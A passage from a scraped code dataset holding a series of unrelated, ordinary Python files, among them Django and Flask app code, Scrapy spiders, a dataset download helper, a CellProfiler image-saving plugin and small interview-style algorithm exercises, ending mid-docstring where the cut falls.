config_obj = configuration.Configuration()\r\n details_dict1 = config_obj.get_configuration()\r\n\r\n dm_obj = PayerAuthenticationApi(details_dict1)\r\n return_data, status, body = dm_obj.check_payer_auth_enrollment(message_body)\r\n print(\"API RESPONSE CODE : \", status)\r\n print(\"API RESPONSE BODY : \", body)\r\n\r\n return return_data\r\n except Exception as e:\r\n print(\"Exception when calling PayerAuthenticationApi->authentication_with_new_account: %s\\n\" % e)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n 
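# run the enrollment-check sample when this file is executed directly\r\n    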
authentication_with_new_account()\r\n\r\n","sub_path":"samples/payer_authentication/coreservices/authentication_with_new_account.py","file_name":"authentication_with_new_account.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"351932788","text":"\"\"\"\nThese scripts populate the AppTwo database with dummy data using the Faker\nLibrary\n\"\"\"\n\n# NOTE: importing the Django settings must be done before anything else!\nimport os\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ProTwo.settings')\n\n# NOTE: Sets up the django environment from the above setup settings\nimport django\ndjango.setup()\n\n## FAKE POPULATION SCRIPT\nfrom AppTwo.models import User\nfrom faker import Faker\n\nfakegen = Faker()\n\ndef populate(N=5):\n \"\"\"\n Function to populate database with fake data using the Faker library. The\n user can input the amount of fake data being populated, with the function\n defaulting to 5 iterations.\n\n For each iteration, the function generates fake data using the Faker\n library, and creates a new User entry in the linked database table using\n the get_or_create() method. This method queries the database for the data\n provided in the method's parameters, and if the data is present, it is\n qeuried; if the data is not present, it is inserted as a new entry. The\n data is then returned as a single item tuple.\n \"\"\"\n for entry in range(N):\n # Create the fake data for the entry\n fake_name = fakegen.name().split()\n fake_first_name = fake_name[0]\n fake_last_name = fake_name[1]\n fake_email = fakegen.email()\n\n # Create the new User entry\n user = User.objects.get_or_create(first_name=fake_first_name, last_name=fake_last_name, email=fake_email)[0]\n\n\nif __name__ == '__main__':\n \"\"\"invokes the populate() function with 20 iterations\"\"\"\n print('Populating the data!')\n populate(20)\n print('Populating complete!')","sub_path":"populate_users.py","file_name":"populate_users.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"329783987","text":"# from app.models import Customer, Video\nfrom app.models.video import Video\nfrom app.models.customer import Customer\nfrom app import db\nfrom datetime import timedelta, datetime\n\n# make a new class inheriting from db.Model (the SQLAlchemy object - SQL like singular class names):\nclass Rental(db.Model):\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n due_date = db.Column(db.DateTime, default=((datetime.now() + timedelta(7))), nullable=False)\n # due_date = db.Column(db.DateTime, nullable=False)\n checked_out = db.Column(db.Boolean, default=False, nullable=False)\n customer_id = db.Column(db.Integer, db.ForeignKey(\"customers.id\")) # ForeignKey refers to the Customer Model Primary Key in the table \"customers\" and column \"id\"\n video_id = db.Column(db.Integer, db.ForeignKey(\"videos.id\")) # ForeignKey refers to the Video Model Primary Key in the table \"videos\" and column \"id\"\n \n customer = db.relationship(\"Customer\", backref=\"rentals\", lazy=\"select\") \n video = db.relationship(\"Video\", backref=\"rentals\", lazy=True) \n\n __tablename__= \"rentals\"\n\n def to_dict(self):\n print(self.video_id)\n\n return {\n \"due_date\": self.due_date, \n \"customer_id\": self.customer_id,\n \"video_id\": self.video_id,\n \"videos_checked_out_count\": self.customer.videos_checked_out_count,\n 
\"available_inventory\": self.video.available_inventory\n }\n \n\n @classmethod\n def checkout(cls, customer_id, video_id):\n\n customer = Customer.query.get(customer_id)\n video = Video.query.get(video_id)\n\n new_rental = Rental(\n customer_id = customer.id, \n video_id = video.id, \n checked_out = True # switches the rental checked_out column to True\n ) \n\n customer.videos_checked_out_count += 1\n video.available_inventory -= 1\n\n db.session.add(new_rental)\n db.session.commit()\n\n return new_rental\n\n \n def checkin(self):\n\n return {\n \"customer_id\": self.customer_id,\n \"video_id\": self.video_id,\n \"due_date\": self.due_date,\n \"videos_checked_out_count\": self.customer.videos_checked_out_count,\n \"available_inventory\": self.video.available_inventory\n }\n \n\n","sub_path":"app/models/rental.py","file_name":"rental.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"98472035","text":"\n# Create your views here.\nfrom django.shortcuts import render,redirect\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate,login\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .forms import StoreForm,productStoreForm\nfrom Store.models import Store,productStore\n@login_required\n@csrf_exempt\ndef Store(request):\n if request.method==\"POST\":\n form =StoreForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('index')\n else:\n form =StoreForm()\n # objects=Store.objects.all()\n i=2\n return render(request,\"Store.html\",{'form':form,'i':i})\ndef ProductStore(request):\n if request.method==\"POST\":\n form =productStoreForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('index')\n else:\n form =productStoreForm()\n # objects=productStore.objects.all()\n i=1\n return render(request,\"Store.html\",{'form':form,'i':i})\n \ndef allStore(request):\n category=productStore.objects.all()\n return render(request,\"allstore.html\",{'Products':category})","sub_path":"Store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"515264171","text":"from django.urls import path\r\nfrom .views import (\r\n home, \r\n listPerson, \r\n listVehicles, \r\n listMovRotarys, \r\n listMovMonthly, \r\n listMonthly,\r\n personRegister,\r\n vehicleRegister,\r\n)\r\n\r\n\r\nurlpatterns = [\r\n path('', home, name='core_home'),\r\n path('persons/', listPerson, name='core_list_person'),\r\n path('persons_register/', personRegister, name='core_person_register'),\r\n path('vehicles/', listVehicles, name='core_list_vehicles'),\r\n path('vehicles_register/', vehicleRegister, name='core_vehicles_register'),\r\n path('rotarys/', listMovRotarys, name='core_list_mov_rotarys'),\r\n path('mov-monthly/', listMovMonthly, name='core_list_mov_monthly'),\r\n path('monthly/', listMonthly, name='core_list_monthly'),\r\n]","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"456739682","text":"class Solution:\n def productExceptSelf(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n productUntilIndex, product = [], 1\n res = [None] * len(nums)\n for i in range(len(nums)):\n productUntilIndex.append(product)\n 
product *= nums[i]\n product = 1\n for i in range(len(nums) - 1, -1, -1):\n res[i] = productUntilIndex[i] * product\n product *= nums[i]\n return res\n","sub_path":"amazon/arrays_and_strings/product_of_array_except_self.py","file_name":"product_of_array_except_self.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"650311584","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport os\nimport csv\n\n\nclass OnlineradioboxSpider(scrapy.Spider):\n name = 'onlineradiobox'\n allowed_domains = ['onlineradiobox.com']\n start_urls = ['https://onlineradiobox.com/']\n\n def parse(self, response):\n links = response.xpath('.//*[@class=\"catalog__mainland-list\"]/li/a/@href').extract()\n for link in links:\n yield scrapy.Request(response.urljoin(link),callback=self.getcountry)\n\n def getcountry(self,response):\n datas = response.xpath('.//*[@class=\"countries__countries-list tab-pane fade in active\"]/li').extract()\n for data in datas:\n sel = scrapy.Selector(text=data)\n link = sel.xpath('.//a/@href').extract_first()\n country = sel.xpath('.//a/text()').extract_first()\n\n yield scrapy.Request(response.urljoin(link),callback=self.getstates,meta={\n 'country':country\n })\n\n def getstates(self,response):\n links = response.xpath('.//*[@class=\"regions-list\"]/li/a/@href').extract()\n for link in links:\n yield scrapy.Request(response.urljoin(link),callback=self.getstations,meta={\n 'country':response.meta.get('country')\n })\n\n def getstations(self,response):\n stations = response.xpath('.//*[@class=\"stations__station__title\"]/a/@href').extract()\n for station in stations:\n yield scrapy.Request(response.urljoin(station),callback=self.getdatas,meta={\n 'country':response.meta.get('country')\n })\n\n def getdatas(self,response):\n title = response.xpath('.//*[@class=\"station__title\"]/text()').extract_first()\n location = response.xpath('.//*[@itemprop=\"additionalProperty\"]/text()').extract_first()\n try:\n tags = ', '.join(response.xpath('.//*[@class=\"station__tags\"]/li/a/text()').extract())\n except:\n tags = ''\n description = response.xpath('.//*[@itemprop=\"description\"]/text()').extract_first()\n website = response.xpath('.//*[@itemprop=\"url\"]/@href').extract_first()\n facebook = response.xpath('.//*[@title=\"Facebook\"]/@href').extract_first()\n twitter = response.xpath('.//*[@title=\"Twitter\"]/@href').extract_first()\n wikipedia = response.xpath('.//*[@title=\"Wikipedia\"]/@href').extract_first()\n\n if 'onlineradiobox.csv' not in os.listdir(os.getcwd()):\n with open(\"onlineradiobox.csv\",\"a\") as f:\n writer = csv.writer(f)\n writer.writerow(['country','title','location','tags','description','website','facebook','twitter','wikipedia'])\n\n\n with open(\"onlineradiobox.csv\",\"a\") as f:\n writer = csv.writer(f)\n writer.writerow([response.meta.get('country'),title,location,tags,description,website,facebook,twitter,wikipedia])\n print([response.meta.get('country'),title,location,tags,description,website,facebook,twitter,wikipedia])\n\n","sub_path":"radiosync/spiders/onlineradiobox.py","file_name":"onlineradiobox.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"454297982","text":"class Student:\n def __init__(self, name, school):\n self.name = name\n self.school = school\n self.marks = []\n\n @classmethod\n def friend(cls, origin, friend_name, salary):\n return cls(friend_name, 
origin.school, salary)\n\n\"\"\"\nanna = Student(\"Anna\", \"Oxford\")\nfriend = anna.friend(\"Greg\")\nprint(friend.name)\n\"\"\"\n\nclass WorkingStudent(Student):\n def __init__(self, name, school, salary):\n super().__init__(name, school)\n self.salary = salary\n\nanna = WorkingStudent(\"Anna\", \"Oxford\", 6000)\nprint(anna.salary)\n\nfriend = WorkingStudent.friend(anna, \"Greg\", 1000)\nprint(friend.name)\nprint(friend.salary)\n","sub_path":"Python Basics/inheritance.py","file_name":"inheritance.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"601100532","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\n\nimport os\nimport sys\nimport shutil\nimport hashlib\nimport platform\n\nimport numpy as np\nimport pandas as pd\nfrom .base import PipelineFinder\n\n\ndef load_dataset(name='treclegal09_2k_subset', cache_dir='/tmp',\n force=False, verbose=True,\n return_file_path=False,\n load_ground_truth=False, verify_checksum=False):\n \"\"\" Download a benchmark dataset.\n\n The currently supported datasets are listed below,\n\n 1. TREC 2009 legal collection\n\n - treclegal09_2k_subset : 2 400 documents, 2 MB\n - treclegal09_20k_subset : 20 000 documents, 30 MB\n - treclegal09_37k_subset : 37 000 documents, 55 MB\n - treclegal09 : 700 000 documents, 1.2 GB\n\n The ground truth files for categorization are adapted from TAR Toolkit.\n\n 2. Fedora mailing list (2009-2009)\n - fedora_ml_3k_subset\n\n If you encounter any issues for downloads with this function,\n you can also manually download and extract the required dataset to `cache_dir` (the\n download url is `http://r0h.eu/d/<name>.tar.gz`), then re-run this function to get\n the required metadata.\n\n Parameters\n ----------\n name : str, default='treclegal09_2k_subset'\n the name of the dataset file to load\n cache_dir : str, default='/tmp/'\n root directory where to save the download\n force : bool, default=False\n download again if the dataset already exists.\n Warning: this will remove previously downloaded files!\n return_file_path : bool, default=False\n also return a list of all filenames\n load_ground_truth : bool, default=False\n parse the ground truth files present in the dataset\n verbose : bool, default=False\n print download progress\n verify_checksum : bool, default=False\n verify the checksum of the downloaded archive\n\n Returns\n -------\n\n response: dict\n a dictionary containing paths to the dataset and corresponding metadata\n \"\"\"\n import tarfile\n import requests\n from .ingestion import DocumentIndex\n from .io import parse_ground_truth_file\n\n VALID_MD5SUM = {'treclegal09_2k_subset' : '8090cc55ac18fe5c4d5d53d82fc767a2',\n 'treclegal09_20k_subset': '43a711897ce724e873bdbc47a374a57e',\n 'treclegal09_37k_subset': '9fb6b7505871bbaee5a438de3b0f497c',\n 'legal09int': 'None',\n 'fedora_ml_3k_subset': '09dbb03d13b8e341bd615ce43f2d836b'\n }\n\n DATASET_SIZE = {'treclegal09_2k_subset' : 2.8,\n 'treclegal09_20k_subset': 30,\n 'treclegal09_37k_subset': 55,\n 'legal09int': 1500,\n 'fedora_ml_3k_subset': 3,\n }\n\n if name not in VALID_MD5SUM:\n raise ValueError('Dataset name {} not known!'.format(name))\n\n\n base_url = \"http://r0h.eu/d/{}.tar.gz\".format(name)\n\n # make sure we don't have \"ediscovery_cache\" in the path\n cache_dir = PipelineFinder._normalize_cachedir(cache_dir)\n cache_dir = 
os.path.dirname(cache_dir)\n \n\n outdir = os.path.join(cache_dir, name)\n fname = outdir + \".tar.gz\"\n\n if os.path.exists(outdir) and force:\n shutil.rmtree(outdir)\n\n # Download the the dataset if it doesn't exist\n if not os.path.exists(outdir):\n\n if verbose:\n print('\\nWarning: downloading dataset {} ({} MB) !'.format(name,\n DATASET_SIZE[name]))\n response = requests.get(base_url, stream=False, allow_redirects=True)\n with open(fname, \"wb\") as fh:\n for idx, chunk in enumerate(response.iter_content(chunk_size=1024)):\n if chunk:\n fh.write(chunk)\n if verbose:\n print('\\nFile {} downloaded!'.format(fname))\n\n if verify_checksum:\n # compute the md5 hash by chunks\n with open(fname, 'rb') as fh:\n block_size=2**20\n md5 = hashlib.md5()\n while True:\n data = fh.read(block_size)\n if not data:\n break\n md5.update(data)\n hash_val = md5.hexdigest()\n if hash_val != VALID_MD5SUM[name]:\n raise IOError('Checksum failed for the dataset, this may be due'\n 'to a corrupted download. Try running this function'\n 'again with the `force=True` option.')\n\n # extract the .tar.gz\n with tarfile.open(fname, \"r:gz\") as tar:\n tar.extractall(path=cache_dir)\n if verbose:\n print('Archive extracted!'.format(fname))\n\n\n\n results = {'base_dir': outdir, 'data_dir': os.path.join(outdir, 'data')}\n if name == 'legal09int':\n results['data_dir'] = results['base_dir']\n di = DocumentIndex.from_folder(results['data_dir'])\n results['document_id'] = [idx for idx, _ in enumerate(di.filenames)]\n if return_file_path:\n results['file_path'] = di.filenames\n\n\n\n if load_ground_truth and 'treclegal09' in name:\n with open(os.path.join(outdir,'seed_relevant.txt'), 'rt') as fh:\n relevant_files = [el.strip() for el in fh.readlines()]\n\n with open(os.path.join(outdir,'seed_non_relevant.txt'), 'rt') as fh:\n non_relevant_files = [el.strip() for el in fh.readlines()]\n\n\n if platform.system() == 'Windows':\n relevant_files = [el.replace('/', '\\\\') for el in relevant_files]\n non_relevant_files = [el.replace('/', '\\\\') for el in non_relevant_files]\n\n results['seed_file_path'] = relevant_files + non_relevant_files \n res = di.search(pd.DataFrame({'file_path': relevant_files + non_relevant_files}))\n results['seed_document_id'] = res.internal_id.values.tolist() # document_id & internal_id are the same\n results['seed_y'] = list(np.concatenate((np.ones(len(relevant_files)),\n np.zeros(len(non_relevant_files)))).astype('int'))\n\n ground_truth_file = os.path.join(outdir, \"ground_truth_file.txt\") \n gt = parse_ground_truth_file(ground_truth_file)\n\n res = di.search(gt, drop=False)\n results['ground_truth_y'] = res.is_relevant.values.tolist()\n\n return results\n\n\n\n\n\n","sub_path":"freediscovery/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":6505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"26442561","text":"# coding=utf-8\n\n#################################\n#\n# Imports from useful Python libraries\n#\n#################################\n\nimport numpy\nimport scipy.ndimage\nimport imageio\n\n#################################\n#\n# Imports from CellProfiler\n#\n##################################\n\nimport cellprofiler.image\nimport cellprofiler.module\nimport cellprofiler.setting\n\n__doc__ = \"\"\"\\\nSave16BitPngs\n=============\n**Save16BitPngs** is a hacky module that can save 16 bit images in .png format, something that is not supported in CellProfiler 3.1.5.\nDo not run this module for any other 
save operation.\n|\n============ ============ ===============\nSupports 2D? Supports 3D? Respects masks?\n============ ============ ===============\nYES NO NO\n============ ============ ===============\nSee also\n^^^^^^^^\n\nWhat do I need as input?\n^^^^^^^^^^^^^^^^^^^^^^^^\nA .tiff flourescent image\nWhat do I get as output?\n^^^^^^^^^^^^^^^^^^^^^^^^\n\nTechnical notes\n^^^^^^^^^^^^^^^\nExporting 16bit png images can be relevant for certain convolutional neural network designs\n\nReferences\n^^^^^^^^^^\nNiklas Rindtorff\n\"\"\"\n\n#\n# Constants\n#\n# It's good programming practice to replace things like strings with\n# constants if they will appear more than once in your program. That way,\n# if someone wants to change the text, that text will change everywhere.\n# Also, you can't misspell it by accident.\n#\n#GRADIENT_MAGNITUDE = \"Gradient magnitude\"\n#\n# The module class.\n#\n# Your module should \"inherit\" from cellprofiler.module.Module, or a\n# subclass of cellprofiler.module.Module. This module inherits from\n# cellprofiler.module.ImageProcessing, which is the base class for\n# image processing modules. Image processing modules take an image as\n# input and output an image.\n#\n# This module will use the methods from cellprofiler.module.ImageProcessing\n# unless you re-implement them. You can let cellprofiler.module.ImageProcessing\n# do most of the work and implement only what you need.\n#\n# Other classes you can inherit from are:\n#\n# - cellprofiler.module.ImageSegmentation: modules which take an image\n# as input and output a segmentation (objects) should inherit from this\n# class.\n# - cellprofiler.module.ObjectProcessing: modules which operate on objects\n# should inherit from this class. These are modules that take objects as\n# input and output new objects.\n#\nclass Save16BitPngs(cellprofiler.module.ImageProcessing):\n #\n # The module starts by declaring the name that's used for display,\n # the category under which it is stored and the variable revision\n # number which can be used to provide backwards compatibility if\n # you add user-interface functionality later.\n #\n # This module's category is \"Image Processing\" which is defined\n # by its superclass.\n #\n module_name = \"Save16BitPngs\"\n\n variable_revision_number = 1\n\n #\n # \"create_settings\" is where you declare the user interface elements\n # (the \"settings\") which the user will use to customize your module.\n #\n # You can look at other modules and in cellprofiler.settings for\n # settings you can use.\n #\n def create_settings(self):\n #\n # The superclass (cellprofiler.module.ImageProcessing) defines two\n # settings for image input and output:\n #\n # - x_name: an ImageNameSubscriber which \"subscribes\" to all\n # ImageNameProviders in prior modules. Modules before yours will\n # put images into CellProfiler. The ImageNameSubscriber gives\n # your user a list of these images which can then be used as inputs\n # in your module.\n # - y_name: an ImageNameProvider makes the image available to subsequent\n # modules.\n super(Save16BitPngs, self).create_settings()\n\n #\n # reST help that gets displayed when the user presses the\n # help button to the right of the edit box.\n #\n # The superclass defines some generic help test. You can add\n # module-specific help text by modifying the setting's \"doc\"\n # string.\n #\n self.x_name.doc = \"\"\"\\\nThis is the image that the module operates on. 
You can choose any image\nthat is made available by a prior module.\n**Save16BitPngs** will do something to this image.\n\"\"\"\n # We use a float setting so that the user can give us a number\n # for the scale. The control will turn red if the user types in\n # an invalid scale.\n #\n self.single_file_name = cellprofiler.setting.Text(\n \"Enter single file name\",\n \"OrigBlue\",\n metadata=True,\n doc=\"\"\"\\\nThis sets the image file name - You should use metadata information to fill this name, otherwise the pipeline will simply overwrite images!.\n\"\"\"\n )\n\n #\n # The \"settings\" method tells CellProfiler about the settings you\n # have in your module. CellProfiler uses the list for saving\n # and restoring values for your module when it saves or loads a\n # pipeline file.\n #\n def settings(self):\n #\n # The superclass's \"settings\" method returns [self.x_name, self.y_name],\n # which are the input and output image settings.\n #\n settings = super(Save16BitPngs, self).settings()\n\n # Append additional settings here.\n return settings + [\n self.single_file_name\n ]\n\n #\n # \"visible_settings\" tells CellProfiler which settings should be\n # displayed and in what order.\n #\n # You don't have to implement \"visible_settings\" - if you delete\n # visible_settings, CellProfiler will use \"settings\" to pick settings\n # for display.\n #\n def visible_settings(self):\n #\n # The superclass's \"visible_settings\" method returns [self.x_name,\n # self.y_name], which are the input and output image settings.\n #\n visible_settings = super(Save16BitPngs, self).visible_settings()\n\n # Configure the visibility of additional settings below.\n visible_settings += [\n self.single_file_name\n ]\n\n return visible_settings\n\n #\n # CellProfiler calls \"run\" on each image set in your pipeline.\n #\n def run(self, workspace):\n #\n # The superclass's \"run\" method handles retreiving the input image\n # and saving the output image. Module-specific behavior is defined\n # by setting \"self.function\", defined in this module. \"self.function\"\n # is called after retrieving the input image and before saving\n # the output image.\n #\n # The first argument of \"self.function\" is always the input image\n # data (as a numpy array). The remaining arguments are the values of\n # the module settings as they are returned from \"settings\" (excluding\n # \"self.y_data\", or the output image).\n #\n self.function = save16bitpng\n\n super(Save16BitPngs, self).run(workspace)\n\n #\n # \"volumetric\" indicates whether or not this module supports 3D images.\n # The \"gradient_image\" function is inherently 2D, and we've noted this\n # in the documentation for the module. Explicitly return False here\n # to indicate that 3D images are not supported.\n #\n def volumetric(self):\n return False\n\n#\n# This is the function that gets called during \"run\" to create the output image.\n# The first parameter must be the input image data. 
The remaining parameters are\n# the additional settings defined in \"settings\", in the order they are returned.\n#\n# This function must return the output image data (as a numpy array).\n#\ndef save16bitpng(pixels, single_file_name):\n #Converting percentile\n mat_ms = pixels*65535\n mat_ms = mat_ms.astype(numpy.uint16)\n #I store\n imageio.imwrite(uri = single_file_name, im = mat_ms)\n #return pixels\n","sub_path":"unmaintained_plugins/CellProfiler3/save_16bit_pngs.py","file_name":"save_16bit_pngs.py","file_ext":"py","file_size_in_byte":7822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"210216848","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport pymongo\nfrom scrapy.exceptions import DropItem\n\nclass MyscrapyPipeline(object):\n def __init__(self):\n connection = pymongo.MongoClient(host='127.0.0.1',port=27017)\n db = connection.DoubanMovie\n self.collect = db.MovieTop250\n\n def process_item(self, item, spider):\n valid = True\n for data in item:\n if not data:\n valid = False\n raise DropItem(\"Missing %s of blogpost from %s\" %(data, item['url']))\n if valid:\n new_moive=[{\n \"title\":item['title']\n }]\n self.collect.insert(new_moive)\n return item\n","sub_path":"myscrapy/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"7367435","text":"import sys\r\n\r\ndef NOD(x, y):\r\n if x%y == 0:\r\n print(\"Greatest Common Divisor: \"+str(y))\r\n else:\r\n NOD(y,x%y)\r\n\r\ndef NOK(x, y):\r\n gcd=(x*y)/NOD(x, y)\r\n print(\"Smallest Common Multiple: \"+str(gcd))\r\n \r\nwhile True:\r\n print(\"Enter numbers as A B. Enter Ex to exit\")\r\n a=input(\"enter first number: \")\r\n b=input(\"enter second number: \")\r\n \r\n if str(a) or str(b) == \"Ex\":\r\n break\r\n if type(a) != int and type(b) != int:\r\n print(\"Error! Number must be integer! 
Try again\")\r\n if a > b:\r\n greater = a\r\n smaller = b\r\n else:\r\n greater = b\r\n smaller = a\r\n NOD(greater, smaller)\r\n NOK(greater, smaller)\r\n \r\n \r\n \r\n \r\n \r\n","sub_path":"gcd.py","file_name":"gcd.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"400227802","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractBaseUser, BaseUserManager\nfrom django.contrib.auth.models import PermissionsMixin\nfrom django.utils.translation import ugettext_lazy as _\nfrom .managers import UserManager, StudentManager\n\n# Create your models here.\nclass User(AbstractBaseUser, PermissionsMixin):\n email = models.EmailField(_(\"email address\"), unique=True)\n first_name = models.CharField(_(\"first_name\"), max_length=40, blank=True)\n last_name = models.CharField(_(\"last name\"), max_length=40, blank=True)\n address = models.CharField(_(\"address\"), max_length=255, blank=True)\n mobile = models.CharField(_(\"mobile\"), max_length=13, blank=True)\n # date_joined = models.DateTimeField(_('date joined'), auto_now_add = True)\n is_active = models.BooleanField(_(\"active\"), default=True)\n is_staff = models.BooleanField(_(\"staff status\"), default=False)\n is_superuser = models.BooleanField(_(\"is superuser\"), default=False)\n is_admin = models.BooleanField(_(\"is admin\"), default=False)\n is_student = models.BooleanField(_(\"is student\"), default=False)\n is_teacher = models.BooleanField(_(\"is teacher\"), default=False)\n\n objects = UserManager()\n\n USERNAME_FIELD = \"email\"\n REQUIRED_FIELDS = [\"first_name\", \"last_name\"]\n\n class Meta:\n verbose_name = _(\"user\")\n verbose_name_plural = _(\"users\")\n\n def get_short_name(self):\n return self.first_name\n\n def get_full_name(self):\n return self.first_name + \"_\" + self.last_name\n\n def save(self, *args, **kwargs):\n\n self.username = self.email\n super(User, self).save(*args, **kwargs)\n\n def __str__(self):\n\n return self.email\n\n\nclass Student(User):\n user = models.OneToOneField(User, on_delete=models.CASCADE, parent_link=True)\n user.is_student = True\n user.is_teacher = False\n department = models.CharField(max_length=40)\n sap_id = models.CharField(max_length=12, default=0, blank=True)\n graduation_year = models.CharField(max_length=4, blank=True)\n objects = StudentManager()\n\n USERNAME_FIELD = \"email\"\n REQUIRED_FIELDS = []\n\n def __str__(self):\n return self.user.email\n","sub_path":"libraryBackend/libraryApp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"195624381","text":"import torch\nimport pandas as pd\nfrom transformers import XLMTokenizer, XLMWithLMHeadModel\n\ntokenizer = XLMTokenizer.from_pretrained(\"xlm-mlm-ende-1024\")\n\nclass load_data():\n\tdef __init__(self, paths = ['./data/train.en','./data/train.de'], pll_size = 10**5):\n\t\tself.src_lang_path = paths[0]\n\t\tself.trgt_lang_path = paths[1]\n\t\tself.pll_size = pll_size\n\n\tdef load(self):\n\t\ti = 0\n\t\tself.src_tokens = []\n\t\tself.trgt_tokens = []\n\t\twith open(self.src_lang_path, 'rt') as f:\n\t\t while(i!=self.pll_size):\n\t\t input_ids = torch.tensor(tokenizer.encode(f.readline()))\n\t\t self.src_tokens.append(input_ids)\n\t\t i = i + 1\n\n\t\twith open(self.trgt_lang_path, 'rt') as f:\n\t\t while(i!=2*self.pll_size):\n\t\t input_ids = 
torch.tensor(tokenizer.encode(f.readline()))\n\t\t self.de_tokens.append(input_ids) \n\t\t i = i + 1\n\n\tdef final_data(self):\n\t\tzipped_list = list(zip(self.src_tokens, self.trgt_tokens))\n\t\tdf_prllel = pd.DataFrame(zipped_list, columns = ['en', 'de'], dtype=object)\n\t\tdf_eng = pd.DataFrame(self.src_tokens)\n\t\tdf_de = pd.DataFrame(self.trgt_tokens)\n\n\t\treturn df_prllel, df_eng, df_de","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"514827781","text":"\"\"\" Google interview problems \"\"\"\n\n\"\"\"\nYou have k lists of sorted integers. Find the smallest range that\nincludes at least one number from each of the k lists.\n\nFor example,\nList 1: [4, 10, 15, 24, 26]\nList 2: [0, 9, 12, 20]\nList 3: [5, 18, 22, 30]\n\nThe smallest range here would be [20, 24] as it contains 24 from list\n1, 20 from list 2, and 22 from list 3.\n\n\"\"\"\n\ndef min_range(l):\n n = len(l)\n idx = [0 for i in range(n)]\n \n stop = False\n while not stop:\n k = [ (i, l[i][idx[i]]) for i in range(n)]\n k.sort(key = lambda x: x[1])\n (j, val) = k[0]\n if idx[j] == len(l[j]) -1 :\n stop = True\n else:\n idx[j] = idx[j] + 1\n result = [l[i][idx[i]] for i in range(n)]\n return result\n \n\n\"\"\" Give you an array which has n integers,it has both positive and\nnegative integers.Now you need sort this array in a special way.After\nthat,the negative integers should in the front,and the positive\nintegers should in the back.Also the relative position should not be\nchanged. eg. -1 1 3 -2 2 ans: -1 -2 1 3 2. \"\"\"\n\ndef stable_partition(l):\n pos = [x for x in l if x >0]\n neg = [y for y in l if y < 0]\n return (pos, neg)\n\n\"\"\" Given an array of integers. Find two disjoint contiguous sub-\narrays such that the absolute difference between the sum of two sub-\narray is maximum. 
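# ---------------------------------------------------------------------------
# Illustrative sketch: min_range above advances the pointer of the smallest
# list but returns only the window left when one list is exhausted, not the
# smallest window seen. The standard fix tracks the best (max - min) pair as
# it goes; a heap brings each step to O(log k).
import heapq

def smallest_range(lists):
    heap = [(lst[0], i, 0) for i, lst in enumerate(lists)]
    heapq.heapify(heap)
    cur_max = max(lst[0] for lst in lists)
    best = (heap[0][0], cur_max)
    while True:
        val, i, j = heapq.heappop(heap)
        if cur_max - val < best[1] - best[0]:
            best = (val, cur_max)
        if j + 1 == len(lists[i]):
            return best  # one list exhausted: no window can cover all k lists
        nxt = lists[i][j + 1]
        cur_max = max(cur_max, nxt)
        heapq.heappush(heap, (nxt, i, j + 1))

assert smallest_range([[4, 10, 15, 24, 26], [0, 9, 12, 20], [5, 18, 22, 30]]) == (20, 24)
# ---------------------------------------------------------------------------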
